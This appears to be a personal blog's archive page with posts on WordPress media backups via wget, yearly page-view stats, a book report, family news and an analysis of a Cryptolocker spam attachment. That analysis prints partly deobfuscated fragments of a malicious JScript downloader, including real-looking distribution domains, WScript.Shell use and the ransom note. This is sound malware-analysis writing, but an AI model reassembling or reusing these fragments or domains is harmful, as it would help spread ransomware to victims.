Archive for category Administrivia

Blog Backup: Incremental Media

The recipe for incrementally copying media files since the previous blog backup works like this:

grep attachment_url *xml > attach.txt
sed 's/^.*http/http/' attach.txt | sed 's/<\/wp.*//' > download.txt
wget -nc -w 2 --no-verbose --random-wait --force-directories --directory-prefix=Media/ -i download.txt
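
The first two lines of that recipe can be folded into a single sed pass. This is only a sketch: extract_urls is a made-up helper name, and it assumes the export files carry one bare attachment URL per wp:attachment_url tag, with no CDATA wrapper around it.

```shell
#!/bin/sh
# Sketch: pull attachment URLs out of WordPress export files in one sed pass.
# extract_urls is a hypothetical helper name, not part of any tool.
extract_urls() {
    # -n plus the trailing p prints only lines where the substitution matched,
    # so lines without an attachment_url tag are dropped without a grep.
    sed -n 's/^.*<wp:attachment_url>\(http[^<]*\)<\/wp:attachment_url>.*$/\1/p' "$@"
}

# Usage (not run here):
#   extract_urls *xml > download.txt
```

The intermediate attach.txt file goes away, at the cost of a regex that is fussier about the exact tag layout.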

The -nc sets the “no clobber” option, which (paradoxically) simply avoids downloading a duplicate of an existing file. Otherwise, it’d download the file and glue on a *.1 suffix, which isn’t a desirable outcome. The myriad (thus far, 0.6 myriad) already-copied files generate a massive stream of messages along the lines of File ‘mumble’ already there; not retrieving.

Adding --no-verbose will cut the clutter and emit some comfort messages.
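
Another way to quiet things down would be to hand wget only the URLs with no local copy. A minimal sketch, assuming the --force-directories layout of prefix/host/path and URLs with neither query strings nor percent-escaped characters; pending_urls and new.txt are hypothetical names:

```shell
#!/bin/sh
# Hypothetical helper: read URLs on stdin, print those with no local file yet.
# Assumes wget --force-directories stored each file as PREFIX/host/path.
pending_urls() {
    prefix=$1
    while IFS= read -r url; do
        [ -n "$url" ] || continue          # skip blank lines
        rel=${url#*://}                    # drop the http:// or https:// scheme
        [ -e "$prefix/$rel" ] || printf '%s\n' "$url"
    done
}

# Usage (not run here):
#   pending_urls Media < download.txt > new.txt
#   wget -nc -w 2 --no-verbose --random-wait --force-directories --directory-prefix=Media/ -i new.txt
```

Keeping -nc in the wget line still guards against anything the filter misjudges.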

There seems to be no way to recursively fetch only newer media files directly from the WordPress file URL with -r -N; the site redirects the http:// requests to the base URL, which doesn’t know about bare media files and coughs up a “not found” error.

Blog Summary: 2016

Page views for 2016:

Blog Page Views: 2016

That works out to a bit under 1000 page views/day of purely organic traffic.

As always, way more people than I’d expect come here with plumbing problems. On the upside, much of the bedbug saga has fallen off the trailing edge of the wedge; life is good!

Blog Backup

Recent news about Dropbox removing its Public folder feature reminded me to do my every-other-month blog backup. WordPress provides a method to “export” the blog’s text and metadata in their XML-ish format, so you can (presumably) import your blog into another WordPress instance on the server of your choice. However, the XML file (actually, ten of ’em, all tucked into a paltry 8 MB ZIP file) does not include the media files referenced in the posts, which makes sense.

Now, being that type of guy, I have the original media files (mostly pictures) tucked away in a wide variety of directories on the file server. The problem is that there’s no easy way to match the original file to the WordPress instance; I do not want to produce a table by hand.

Fortunately, the entry for each blog post labels the URL of each media file with a distinct XML tag:

		<wp:attachment_url>https://softsolder.files.wordpress.com/2008/12/cimg2785-blender-bearings.jpg</wp:attachment_url>

Note the two leading tabs: it’s prettyprinted XML. (Also, should you see escaped characters instead of < and >, then WordPress has chewed on the source code again.)

While I could gimmick up a script (likely in Python) to process those files, this is simple enough to succumb to a Bash-style BFH:

grep attachment_url *xml > attach.txt
sed 's/^.*http/http/' attach.txt | sed 's/<\/wp.*//' > download.txt
wget --no-verbose --wait=5 --random-wait --force-directories --directory-prefix=/where/I/put/WordPress/Backups/Media/ -i download.txt

That fetches 6747 media files = 1.3 GB, tucks them into directories corresponding to their WordPress layout, and maintains their original file dates. I rate-limited the download to an average of 5 s/file in the hope of not being banned as a pest, so the whole backup takes the better part of ten hours.
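
The ten-hour figure falls out of simple arithmetic. A quick sketch, counting only the average wait between files and ignoring the transfer time itself:

```shell
#!/bin/sh
# Back-of-envelope download time: file count times average wait.
files=6747      # media file count from the post
wait_s=5        # --wait=5; --random-wait varies each pause around that value
total_s=$(( files * wait_s ))
hours=$(( total_s / 3600 ))
minutes=$(( (total_s % 3600) / 60 ))
echo "${total_s} s = ${hours} h ${minutes} min of waiting"
```

The waits alone come to a bit over nine hours, with the actual transfers making up the rest.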

So I wind up blowing an extra gig of disk space on a neatly arranged set of media files that can (presumably) be readily restored to another WordPress instance, should the occasion arise.

Memo to Self: investigate applying the -r option to the base URL, with the -N option to make it incremental, for future updates.

The Thrilling Adventures of Lovelace and Babbage

We’re reading Sydney Padua’s The Thrilling Adventures of Lovelace and Babbage as our evening story, so I gave a Lightning talk at the MHV LUG meeting last week:

MHVLUG – Lovelace and Babbage – Book Report

Earlier versions of the graphic novel are on her blog, including several stories that didn’t make the final book cut.

Highly recommended; if you don’t have wet eyes occasionally, you’re entirely too hard-hearted.

You should read Ada’s Analytical Engine Programming Guide; that’s not her title, but that’s what she wrote. If you’ve ever done any assembly language programming, you’ll feel right at home.

Also, get historical documents, commentary, and Analytical Engine emulators (!) at Fourmilab.

Makes me wish I lived in that Pocket Universe, it does:

econ3_005 - Brunel

That picture is ©www.sydneypadua.com, Creative Commons Attribution-NonCommercial 4.0 International License. There exist T-shirts & mugs.

Why Friends Don’t Let Friends Run Windows: Cryptolocker Downloader

Got an email, nominally from one Richard Gilmore of FedEx, concerning a parcel sent as International Next Flight (whatever that is). The Subject line read “We could not deliver your parcel, #00000665103”, although the message didn’t quite match:

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Delivery Label is attached to this email.

Kind regards,
Richard Gilmore,
Sr. Delivery Agent.

The email address had nothing to do with FedEx, of course, and my filters tagged it as spam.

The “label” came in a ZIP file: Label_00000665103.zip

Extracting the “label” produced what would look like an MS Word file, if you were so trusting as to hide extensions of “known” filetypes and didn’t worry when you saw a file still sporting a DOC extension: Label_00000665103.doc.wsf

Handing that to VirusTotal produces no surprise at all:

VirusTotal Report

The file contains one very long line, the first chunk of which suggests it’s up to no good:

<job><script language=JScript>var a59253 = '+"HKCU"+cs'; var a59168 = '"); fp.WriteLine(" '; var a5988 = ';} else if('; var a59196 = 'gth;i'; var a59160 = 'fp.W'; var a59261 = 'ion"+c'; var a5999 = 's(f'; var a59254 = '+"SOFTWARE"+';

After a bit of poking, I applied a few minutes of sed reformatting, manual cleanup, and sorting:

sed 's/; var a/;\n/g' Label_00000665103.doc.wsf > lines.txt
# ... fix a few lines by hand ...
sort -n lines.txt > sort.txt

Which produced a file starting out like this:

<job><script language=JScript>
590 = 'var id="TRIB9RMvAFl04U4Fi7L6RNk9ZowJ2sj_fIrO0WiXGlXd53j6oENCCFDZ9NbVubN-vvJltoR8Wf4_";d';
591 = '="1vcs62wsoYZNc4TdwqgsG5965bDt3mNYW"; var bc="0.52';
592 = '189"; var ld=0;';
593 = ' var cq';
594 = '=S';
595 = 'tri';
596 = 'ng.f';
597 = 'romCharCode(34);';
598 = ' var cs';
599 = '=Strin';
5910 = 'g.fromCh';
5911 = 'ar';
5912 = 'Code(92); var ll';
5913 = '=["32jelen.pl","v';
5914 = 'iktoriascho';
5915 = 'ol.ru","blende';
5916 = 'r.com.br';
5917 = '","pasargad1007.c';
5918 = 'om","www.unit';
5919 = 'ed-systems.it"';
5920 = ']; v';
5921 = 'ar ';
5922 = 'ws=WScript.Cre';
5923 = 'ateObject(';
5924 = '"WScript.Shell';
5925 = '"); v';
5926 = 'ar';
5927 = ' fn=ws';
5928 = '.Expa';
5929 = 'ndEnv';
5930 = 'ironme';
5931 = 'ntString';
... snippage ...

Even without pasting the fragments back together, you can puzzle out the punchline:

59108 = 't",true); fp.Write';
59109 = 'Line("ATTEN';
59110 = 'TION!"); fp.Wr';
59111 = 'ite';
59112 = 'Line(';
59113 = '""); fp.W';
59114 = 'riteLine("All';
59115 = ' your d';
59116 = 'ocuments, p';
59117 = 'hotos';
59118 = ', databases and ot';
59119 = 'her import';
59120 = 'ant ';
59121 = 'pers';
59122 = 'onal fil';
59123 = 'es"); fp.';
59124 = 'Wri';
59125 = 'te';
59126 = 'Line(';
59127 = '"were e';
59128 = 'ncrypted usi';
59129 = 'ng strong RSA-1024';
59130 = ' algorithm with ';
59131 = 'a uniqu';
59132 = 'e key."); fp.Write';
59133 = 'Line(';
59134 = '"To restor';
59135 = 'e your files you h';
59136 = 'ave to pay "+bc+" ';
59137 = 'BTC (bitcoin';
59138 = 's)."); fp.Wri';
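
For the curious, pasting the fragments back together takes one more sed pass. This is a sketch under two assumptions: every line in the sorted file looks like NNN = 'text'; and numeric order matches the order in which the script concatenates its variables. The join_fragments name is hypothetical, and the result is only printed, never executed.

```shell
#!/bin/sh
# Sketch: glue numerically sorted fragments back into one line of script text.
# join_fragments is a hypothetical helper; it only prints, it never runs anything.
join_fragments() {
    # Keep what sits between the opening quote and the closing ';
    # lines that do not fit the NNN = '...'; pattern are silently skipped.
    sed -n "s/^[0-9][0-9]* = '\(.*\)';\$/\1/p" "$@" | tr -d '\n'
    echo
}

# Usage (not run here):
#   join_fragments sort.txt > joined.txt
```

Read the output in a text editor on a machine that won't run WSF files by accident.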

Huh. CryptoLocker returns from the dead! Right now, 0.52 BTC = $316.15, so I guess I can drop that into the jar of money saved by running Linux.
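
Strictly speaking, fragments 591 and 592 set bc to 0.52189 rather than a round 0.52. A small arithmetic sketch, taking the exchange rate implied by the figures above as the only input:

```shell
#!/bin/sh
# Arithmetic only: the rate implied by "0.52 BTC = $316.15", then the ransom
# at the script's full bc value of 0.52189 BTC, priced at that same rate.
rate=$(awk 'BEGIN { printf "%.2f", 316.15 / 0.52 }')
ransom=$(awk 'BEGIN { printf "%.2f", 0.52189 * 316.15 / 0.52 }')
echo "implied rate: \$${rate}/BTC, full ransom: \$${ransom}"
```

The difference amounts to about a dollar, so the jar of money comes out much the same.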

If those emails didn’t work so well, they wouldn’t send them…

Monthly Science: Chrysalid Engineer

So then this happened:

Karen - canonical tiger paw graduation picture

Yeah, tanker boots and all; not the weirdest thing we saw during RIT’s graduation ceremonies.

This summer marks her fourth of four co-op semesters with Real Companies Doing Tech Stuff, and her final classes end in December; RIT holds one ceremony in the spring, and being offset by a semester apparently isn’t all that unusual. She (thinks she) has a job lined up after graduation and doesn’t need her doting father’s help.

But, hey, should you know someone with a way-cool opportunity (*) for a bright, fresh techie who’s increasingly able to build electronic & mechanical gadgets and make them work, drop me a note and I’ll put the two of you in touch. [grin]

(*) If that opportunity should involve 3D printed prosthetics with sensors and motors, she will crawl right out of your monitor…

Hiatus

After devoting the last few months to setting up the Makerspace Starter Kit and extracting / organizing / stashing the stuff I wanted to keep:

New parts cabinets

I now have some difficulty accomplishing what needs to be done:

Basement Shop - right

During the rest of May I must write a pair of columns, unpack / arrange / reinstall my remaining tools / parts / toys, endure a road trip to our Larval Engineer’s graduation (*), enjoy bicycling with my Lady, and surely repair a few odds-n-ends along the way.

I’ll generate occasional posts through June, after which things should be returning to what passes for normal around here…

(*) For reasons not relevant here, our Larval Engineer’s schedule includes a final co-op and wind-up semester after “graduation”. Perhaps she’s entering the Chrysalis phase of her development?
